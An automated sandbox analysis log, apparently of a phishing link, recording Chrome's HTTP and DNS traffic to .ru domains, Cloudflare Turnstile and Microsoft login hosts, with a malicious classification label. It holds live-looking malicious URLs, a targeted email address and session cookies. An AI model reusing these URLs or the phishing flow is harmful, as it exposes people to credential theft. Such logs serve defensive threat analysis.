Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://lap.gnoqwwhpwe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff194a8eb4842ec&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: lap.gnoqwwhpwe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://lap.gnoqwwhpwe.ru/3aeK/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjE4R2lacS9tVllvMEhpUUtKbDQ2TUE9PSIsInZhbHVlIjoiRXU4Ri80dEhJSWxyRTh6VWZFckNubFhJY3h4bnJpLzRqU2Vac1hSeEE1aDVzUFhxQkJXRytlbkxoZzJaQ3FYNmYrYzFhTG5SZkdhSWY5WENQL3IwVzluY3BWUDFFZXE4bnpHSXRaZ3dXTGgwa2pzRlNVbmJDSHNnUHhhSmhPZnciLCJtYWMiOiJhZWQ4ODRiNDNhZmI3MmVjZjk0YTdkNDY1M2MzNzgzNzk2MDQxZTU1NjJlNDM2MmZjZmM4MWNhODFlYWMxZDRmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImtCb003VmlnZWhsK2JTWmdPSWphU3c9PSIsInZhbHVlIjoiSkZGRmVqSEQxbVlrMjhLc1lEbHJadEtGc282MkRQWG9ORGI3dkNiaFVlT2lrSUpIYlVmREIrOTcxalUzZFJZaDIyNG1qUFFQRmFMenFXeTg2Nk9XTWp2UHdRQXVDeTZRMG5seTRjZmNDWWtOQ3hwZGQxVGhIYVZvS3Q0bDFzcmkiLCJtYWMiOiI1ZWFiMzkxOTkwN2VjNGZlMTM3NTE3YmFkMTZiNmFmZTE2MGFmNjVmYTRmODdjMWEyYTQ0YTBjNTdkOWRkOWRjIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff194a8eb4842ec&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ff194a8eb4842ec/1736395861048/f9f80bbbf521086628021de98408b367f83ff438cb61ab1bcf16bf67eb9bd1d0/rQfzELCojb_dIXk HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ff194a8eb4842ec/1736395861052/t2RBxqreWkaI5Yq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ff194a8eb4842ec/1736395861052/t2RBxqreWkaI5Yq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /88179202633210629qXfkzyHvrVBUQZUAWKGZUAFRQZZZMLJBLFELJHJ HTTP/1.1Host: ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://lap.gnoqwwhpwe.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://lap.gnoqwwhpwe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /88179202633210629qXfkzyHvrVBUQZUAWKGZUAFRQZZZMLJBLFELJHJ HTTP/1.1Host: ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ns?c=dfd0a870-ce3f-11ef-ae3b-e12a94f7ceb6 HTTP/1.1Host: stk.hsprotect.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://msft.hsprotect.netSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://msft.hsprotect.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/v2/msft HTTP/1.1Host: collector-pxzc5j78di.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ns?c=dfd0a870-ce3f-11ef-ae3b-e12a94f7ceb6 HTTP/1.1Host: stk.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/v2/msft HTTP/1.1Host: collector-pxzc5j78di.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: lap.gnoqwwhpwe.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ygvrf8kqyxh6panujwkqqer6w00dbjpogcsuvacqj2hodvh6qgonwxx8lnh.concivergo.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: signup.live.com
Source: global trafficDNS traffic detected: DNS query: logincdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: fpt.live.com
Source: global trafficDNS traffic detected: DNS query: msft.hsprotect.net
Source: global trafficDNS traffic detected: DNS query: client.hsprotect.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: stk.hsprotect.net
Source: global trafficDNS traffic detected: DNS query: collector-pxzc5j78di.hsprotect.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3211sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 04:11:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oqxao9qQCC6II3KSlsZF6aku7OXU7mAi7dckWx91GM1OzUBm%2BxhhaPQi1WEK5sfBwduW0IdgDScmXau4zMP3rcOKzsn0L4GT9p6MF7DOc7FbimndZWzzcruaKpB%2B6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5535&min_rtt=5509&rtt_var=1600&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2233&delivery_rate=501850&cwnd=251&unsent_bytes=0&cid=ca71fd36856065f1&ts=144&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8ff194af5d4f5e7d-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1641&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1896&delivery_rate=1720683&cwnd=227&unsent_bytes=0&cid=2772cc9b4db0ab70&ts=3880&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 04:11:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: ENd+kOHH79grn85wxOSDLUnQO9AJsyZ6W9g=$PeDYsQjyfRO/+RIicache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8ff194b9593ac342-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 04:11:05 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: YdNerJ2mFJDFGYxJqpfHk7bd5vgw+tNt28U=$UynEf8BrL06ZsvaPcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8ff194cc4ac043e2-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 04:11:08 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: pIFl6f+TvV9Se4pCa9XTDBSkIN3mXki6m8U=$wl8QQuSM8YmpOXwOServer: cloudflareCF-RAY: 8ff194e0db034405-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_151.1.drString found in binary or memory: https://client.hsprotect.net/PXzC5j78di/main.min.js
Source: chromecache_141.1.drString found in binary or memory: https://fpt.live.com/
Source: chromecache_100.1.dr, chromecache_111.1.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_100.1.dr, chromecache_111.1.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: classification engineClassification label: mal60.win@24/116@60/14
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1996,i,4207191232076529853,15831843821875857869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1996,i,4207191232076529853,15831843821875857869,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
